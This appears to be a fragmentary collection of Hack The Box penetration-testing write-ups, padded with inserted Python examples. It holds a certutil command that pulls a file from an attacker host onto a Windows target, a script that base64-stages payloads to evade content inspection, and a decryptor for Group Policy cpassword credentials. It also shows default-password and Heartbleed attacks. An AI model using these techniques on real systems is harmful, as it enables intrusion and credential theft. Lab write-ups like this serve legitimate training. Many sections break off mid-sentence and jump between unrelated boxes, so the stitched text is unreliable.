HTB OpenAdmin

Enumeration

$ nmap -A -T4 -p-
$ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e

Access to the site. There is a login link; click it and you'll be redirected. Based on this screenshot, we have an OpenNetAdmin v18.1.1 instance.

Vulnerability analysis

$ searchsploit opennetadmin
$ searchsploit -x 47691

The -d option in curl means data:
-d, --data (HTTP MQTT) Sends the specified data in a POST

HTB Friendzone

$ sudo nmap -A -T4 -p-
$ gobuster -w /usr/share/wordlists/dirb/common.txt dir -u

Access to the site. We discovered that the SSL certificate's common name is a different host name (it is a vhost), so we can also access that vhost once the host has been added to the /etc/hosts file. We can do a zone transfer for the domain I saw earlier on the main page and get the

HTB Access

$ nmap -A -T4 -p-

Open ports detected:
• 21/tcp open ftp Microsoft ftpd
• 23/tcp open telnet?
• 80/tcp open http Microsoft IIS httpd 7.5

$ ftp
ftp> dir
ftp> cd Backups
ftp> dir
ftp> get backup.mdb
ftp> cd ..
ftp> dir
ftp> cd Engineer
ftp> dir
ftp> get «Access»

The files haven't been downloaded correctly. By default the ftp client transfers in ASCII mode, which is meant for text files and rewrites line endings, so a binary file such as an .mdb or a .zip arrives altered. We need to download these files again, this time using
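To see why the ASCII-mode download corrupts a binary file, and to fetch it correctly without relying on remembering to type `binary` in the interactive client, here is an added example (not the blog's own code). The host, credentials and the sample bytes are constructed; `ftplib.retrbinary` sends TYPE I before RETR, which is exactly what the interactive `binary` command does.

```python
"""ASCII vs binary FTP transfers: why the .mdb came back broken.

Added example, not code from the original post. Host, credentials and
the sample blob are constructed placeholders.
"""
import ftplib
import hashlib


def ascii_mode_transfer(data: bytes) -> bytes:
    """Simulate the client side of an ASCII-mode (TYPE A) transfer on a
    Unix box: every CRLF received on the wire is turned into a bare LF.
    That is the intended newline translation for text, but for a binary
    file it silently drops every 0x0D that happens to precede 0x0A."""
    return data.replace(b"\r\n", b"\n")


def binary_mode_transfer(data: bytes) -> bytes:
    """TYPE I (the `binary` command): bytes arrive untouched."""
    return data


def corrupted_by_ascii_mode(data: bytes) -> bool:
    """True when an ASCII-mode transfer would change the file's hash."""
    before = hashlib.sha256(data).digest()
    after = hashlib.sha256(ascii_mode_transfer(data)).digest()
    return before != after


def fetch_binary(host: str, remote_path: str, local_path: str,
                 user: str = "anonymous", password: str = "") -> int:
    """Download remote_path in binary mode and return the bytes written.
    retrbinary issues TYPE I itself, so the download can never fall back
    to the ASCII default of the interactive client."""
    written = 0
    with ftplib.FTP(host) as ftp, open(local_path, "wb") as out:
        ftp.login(user, password)

        def sink(chunk: bytes) -> None:
            nonlocal written
            out.write(chunk)
            written += len(chunk)

        ftp.retrbinary("RETR " + remote_path, sink)
    return written


if __name__ == "__main__":
    # Constructed blob that contains a CRLF pair, as any real .mdb or .zip will.
    sample = b"\x00\x01\r\n\x02\r\x03\n"
    print("ascii mode corrupts sample:", corrupted_by_ascii_mode(sample))
    # fetch_binary("<ftp-host>", "Backups/backup.mdb", "backup.mdb")  # placeholder host
```

After a binary download, compare the local file size with the size the server lists in `dir`; a mismatch is the quickest sign that a transfer went through in ASCII mode.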

Impacket installation

Impacket is a collection of Python classes for working with network protocols.

Installation process:
1. Download the latest release.
2. Extract the file.
3. Install the requirements.
4. Install the package.

$ pip install -r requirements.txt

If there is an error installing the wheel package, install it individually:
$ pip install wheel

Now run the setup script:
$ python setup.py bdist_wheel

Then try to install the requirements again:
$ pip install -r requirements.txt

Download a file using Certutil.exe

Certutil.exe can be used to download a file to a Windows machine. This command downloads «file» to the Windows machine from «http://<ip>»:

certutil.exe -urlcache -split -f http://<ip>/file file

Depending on the file, it could be detected as malicious and blocked. A possible solution is the method described in this post from

The trick is based on base64-encoding the file when sending the
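As an added example (not code from the original post or the linked article), the attacker-side preparation for that trick: write the payload as base64 in the same layout `certutil -encode` produces (64-column lines between certificate markers), serve the text file, and have the target fetch it with `certutil -urlcache` and turn it back into the binary with `certutil -decode`. The file name, the `<ip>` placeholder and the round-trip check are assumptions of the example.

```python
"""Stage a binary as base64 for a certutil.exe transfer.

Added example, not the blog's own code. File names and the attacker
address are placeholders supplied by the caller.
"""
import base64
import hashlib
from pathlib import Path

HEADER = "-----BEGIN CERTIFICATE-----"
FOOTER = "-----END CERTIFICATE-----"


def to_certutil_b64(data: bytes) -> str:
    """Base64 text in the shape `certutil -encode` writes: the body wrapped
    at 64 columns between certificate markers, which `certutil -decode`
    consumes."""
    body = base64.b64encode(data).decode("ascii")
    lines = [body[i:i + 64] for i in range(0, len(body), 64)]
    return "\n".join([HEADER, *lines, FOOTER]) + "\n"


def from_certutil_b64(text: str) -> bytes:
    """Local check of what `certutil -decode` will produce: skip the
    marker lines and decode the remaining base64 body."""
    body = "".join(
        line.strip() for line in text.splitlines()
        if line.strip() and not line.startswith("-----")
    )
    return base64.b64decode(body)


def transfer_commands(attacker_ip: str, name: str) -> list:
    """Commands to run on the Windows target: fetch the text file over
    HTTP, then decode it back into the original binary."""
    return [
        f"certutil.exe -urlcache -split -f http://{attacker_ip}/{name}.b64 {name}.b64",
        f"certutil.exe -decode {name}.b64 {name}",
    ]


def stage(path: str, attacker_ip: str) -> dict:
    """Write <file>.b64 next to the payload and return what to run on the
    target, plus the payload hash so the decoded copy can be verified."""
    src = Path(path)
    data = src.read_bytes()
    b64_path = src.with_name(src.name + ".b64")
    b64_path.write_text(to_certutil_b64(data))
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "b64_file": str(b64_path),
        "commands": transfer_commands(attacker_ip, src.name),
    }
```

Base64 only changes what crosses the wire; once `certutil -decode` writes the original bytes to disk they are subject to the same on-access scanning as a direct download, so this helps against content inspection in transit, not against endpoint AV.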

Autorecon install

AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. It is intended as a time-saving tool for use in CTFs and other penetration testing environments (e.g. OSCP). It may also be useful in real-world engagements.

Run the installation script:
$ python3 -m pip install git+

Add /home/ruben/.local/bin to your PATH.

Install the other requirements:
$ sudo apt install seclists curl enum4linux gobuster nbtscan nikto nmap onesixtyone oscanner

HTB Active

$ sudo nmap -A -T4 -p-

Let's enumerate the SMB shares using SMBMap.

$ smbmap -H
$ smbclient //
smb: \> dir

This share seems to be a copy of SYSVOL. According to the information found in "Finding Passwords in SYSVOL & Exploiting Group Policy Preferences" and "Attack Methods for Gaining Domain Admin Rights in Active Directory", we need to find a file such as Groups.xml, ScheduledTasks.xml or Services.xml where
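The Group Policy Preferences files named above carry the account password in a `cpassword` attribute: AES-256-CBC ciphertext, base64 encoded with the trailing `=` padding stripped, under a fixed key Microsoft published in the MS-GPPREF specification. Here is an added example (not the blog's own code) that walks a SYSVOL copy for those attributes, restores the padding, and decrypts them the same way Kali's `gpp-decrypt` does. The sample Groups.xml, the account name `EXAMPLE\svc_backup` and its cpassword value are constructed for the example.

```python
"""Find and decrypt Group Policy Preferences credentials in a SYSVOL copy.

Added example, not code from the original post. The sample XML below is
constructed; the AES key is the one Microsoft published (MS-GPPREF).
"""
import base64
import xml.etree.ElementTree as ET

GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)
# Attribute that names the account, per file type:
# Groups.xml -> userName, ScheduledTasks.xml -> runAs, Services.xml -> accountName
ACCOUNT_ATTRS = ("userName", "runAs", "accountName")

# Constructed: base64 of 32 bytes with the trailing '=' dropped, as GPP stores it.
SAMPLE_CPASSWORD = "QUFB" * 10 + "QUE"

# Constructed Groups.xml in the layout GPP writes under
# Policies/<GUID>/Machine/Preferences/Groups/Groups.xml.
SAMPLE_GROUPS_XML = f"""<Groups>
  <User name="svc_backup" image="2" changed="2018-07-18 20:46:06">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="{SAMPLE_CPASSWORD}"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="EXAMPLE\\svc_backup"/>
  </User>
</Groups>
"""


def pad_cpassword(cpassword: str) -> str:
    """GPP strips base64 padding; put it back so the value decodes."""
    return cpassword + "=" * (-len(cpassword) % 4)


def find_gpp_credentials(xml_text: str, source: str) -> list:
    """Return every element carrying a cpassword, with the account it
    belongs to. Works for Groups, ScheduledTasks and Services files."""
    hits = []
    for elem in ET.fromstring(xml_text).iter():
        cp = elem.attrib.get("cpassword")
        if not cp:
            continue
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS
                        if a in elem.attrib), None)
        padded = pad_cpassword(cp)
        hits.append({
            "source": source,
            "element": elem.tag,
            "account": account,
            "cpassword": padded,
            "ciphertext_len": len(base64.b64decode(padded)),
        })
    return hits


def decrypt_cpassword(cpassword: str) -> str:
    """AES-256-CBC with an all-zero IV and PKCS#7 padding; the plaintext is
    UTF-16LE. Needs pycryptodome (pip install pycryptodome)."""
    try:
        from Crypto.Cipher import AES
    except ImportError as exc:
        raise RuntimeError("pip install pycryptodome") from exc
    ciphertext = base64.b64decode(pad_cpassword(cpassword))
    plaintext = AES.new(GPP_AES_KEY, AES.MODE_CBC, iv=b"\x00" * 16).decrypt(ciphertext)
    plaintext = plaintext[:-plaintext[-1]]   # strip PKCS#7 padding
    return plaintext.decode("utf-16-le")


if __name__ == "__main__":
    for hit in find_gpp_credentials(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(hit["source"], hit["element"], hit["account"], hit["cpassword"])
```

Run `find_gpp_credentials` over every `*.xml` under the mounted share (for example with `smbclient`'s `recurse` and `mget`, or `smbmap -R`) and feed each hit to `decrypt_cpassword`; the sample value here is dummy ciphertext, so only a cpassword taken from a real policy file decrypts to a meaningful password.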

HTB Sense

$ nmap -A -T4 -p- sense.htb
$ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e

We need to skip SSL certificate verification using the -k option.

$ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -k
$ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -x .txt

We've found 2 text documents: changelog.txt and system-users.txt.

Company defaults? As we have a pfSense site, we can try the default pfSense password (pfsense).

Access to This

HTB Valentine

$ sudo nmap -T4 -A -p-
$ gobuster dir -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e -k
$ nikto -h
$ sudo nmap --script vuln -p 80
$ sudo nmap --script vuln -p 443

Based on these results, this box is vulnerable to Heartbleed.

$ python
$ strings dump.bin

The dump contains the base64 string aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==, which decodes to heartbleedbelievethehype.

Access to This is hexadecimal encoding. If we use a hexa
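Both artifacts found on this box are encoded text sitting in a memory dump and in a file: a base64 string among the `strings dump.bin` output, and a hex-encoded key file. The following is an added example (not the blog's own code) that automates the `strings` plus decode pass over a dump, keeping only base64 runs that decode to printable text, and decodes a hex-dumped file. The dump bytes and the hex sample are constructed; only the base64 string is the one from the write-up.

```python
"""Carve encoded secrets out of a Heartbleed memory dump.

Added example, not code from the original post. The dump bytes and the
hex sample used in __main__ are constructed.
"""
import base64
import binascii
import re
import string

# A run of base64 alphabet characters, optionally padded. 16 chars is the
# shortest run worth looking at; shorter ones are mostly noise.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")
PRINTABLE = set(string.printable.encode())


def carve_base64(blob: bytes) -> list:
    """Return (encoded, decoded) pairs for every base64-looking run in blob
    whose decoding is printable text. Mirrors `strings dump.bin` followed by
    a base64 -d on each candidate, without the manual copy and paste."""
    found = []
    for match in B64_RUN.finditer(blob):
        token = match.group(0)
        padded = token + b"=" * (-len(token) % 4)   # restore dropped padding
        try:
            decoded = base64.b64decode(padded, validate=True)
        except (binascii.Error, ValueError):
            continue
        # Random memory and hex strings also match the alphabet; they
        # decode to binary junk and are filtered out here.
        if decoded and all(b in PRINTABLE for b in decoded):
            found.append((token.decode("ascii"), decoded.decode("ascii").rstrip("\n")))
    return found


def decode_hex_file(text: str) -> bytes:
    """Decode a file whose contents are the raw bytes written out as hex,
    with any whitespace or line breaks between them."""
    return bytes.fromhex("".join(text.split()))


if __name__ == "__main__":
    # Constructed dump: TLS record bytes around a leaked POST body.
    dump = (b"\x16\x03\x01\x00\x00"
            b"id=2&pass=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==&submit=Login"
            b"\x00\xff////////////////\x00")
    for encoded, decoded in carve_base64(dump):
        print(encoded, "->", decoded)
    # Constructed hex sample of the first bytes of a PEM header.
    print(decode_hex_file("2d 2d 2d 2d 2d 42 45 47 49 4e\n"))
```

Read the dump in chunks of a few megabytes if the Heartbleed script was left running for a while; `re.finditer` on a bytes object works fine on each chunk, and the only runs that matter are the ones that decode to something readable.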

HTB Shocker

ruben@kali:~/htb$ sudo nmap -T4 -sV -p- shocker.htb

We just have Apache on port 80 and OpenSSH on port 2222.

Access to http://shocker.htb

ruben@kali:~/htb$ gobuster dir -u http://shocker.htb -w /usr/share/wordlists/dirb/common.txt -e

We have a cgi-bin folder that may contain script files. Let's use Gobuster again, this time searching for files by extension (.sh, .py). Gobuster takes the extensions as one comma-separated list; giving -x twice keeps only the last value.

$ gobuster dir -u http://shocker.htb/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -x py,sh

Based on the box name